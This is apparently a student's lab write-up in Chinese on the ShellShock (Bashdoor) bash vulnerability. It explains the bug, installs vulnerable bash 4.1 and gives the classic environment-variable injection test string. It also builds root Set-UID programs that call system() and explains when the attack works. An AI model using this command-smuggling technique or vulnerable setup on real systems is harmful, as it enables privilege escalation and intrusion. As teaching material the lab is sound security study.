zoukankan      html  css  js  c++  java
  • 2020-2021-1 20209307 《Linux内核原理与分析》第十二周作业

    这个作业属于哪个课程 <2020-2021-1Linux内核原理与分析)>
    这个作业要求在哪里 <2020-2021-1Linux内核原理与分析第十二周作业>
    这个作业的目标 <ShellShock 攻击实验>
    作业正文 https://www.cnblogs.com/wzyxiaowang/p/14183114.html

    一、什么是ShellShock
    Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。
    二、实验准备、环境搭建
    下载

    $ sudo su
    $ wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz
    

    安装

    $ tar xf bash-4.1.tar.gz
    $ cd bash-4.1
    $ ./configure #这一步过程比较长,请等待一会
    $ make && make install
    

    链接

    $ rm /bin/bash
    $ ln -s /usr/local/bin/bash /bin/bash
    

    检测是否存在shellshock漏洞

    $ exit
    $ env x='() { :; }; echo vulnerable' bash -c "echo this is a test"
    

    输出vulnerable的话,说明bash有漏洞。
    最后,让/bin/sh 指向/bin/bash

    $ sudo ln -sf /bin/bash /bin/sh
    

    三、实验内容
    1、攻击Set-UID程序
    在 /home/shiyanlou 目录下新建一个 shock.c 文件:

    #include <stdio.h>
    void main()
    {
        setuid(geteuid()); // make real uid = effective uid.
        system("/bin/ls -l");
    }
    

    编译这段代码,并设置其为Set-UID程序,保证它的所有者是root。

    $ sudo su
    $ gcc -o shock shock.c
    $ chmod u+s shock
    

    去掉setuid(geteuid()) 语句,修改shock.c

    #include <stdio.h>
    void main()
    {
        system("/bin/ls -l");
    }
    
    $ sudo su
    $ gcc -o sh0ck shock.c
    $ chmod u+s sh0ck
    $ ls -il sh0ck
    $ exit
    $ ./sh0ck
    

    说明 real uid 和 effective uid 相同时,定义在环境变量中的内容在该程序内有效,shellshock漏洞能够被利用。当两个 uid 不同时,环境变量失效,无法进行攻击。

  • 相关阅读:
    策略模式
    简单工厂模式
    单例模式
    sp_xml_preparedocument _使用 处理XML文档
    LINQ to XML
    动态Linq(结合反射)
    IEqualityComparer<T>接口
    Linq to object 技巧、用法集锦
    IComparer<T> 接口Linq比较接口
    Linq to BBJECT之非延时标准查询操作符
  • 原文地址:https://www.cnblogs.com/wzyxiaowang/p/14183114.html
Copyright © 2011-2022 走看看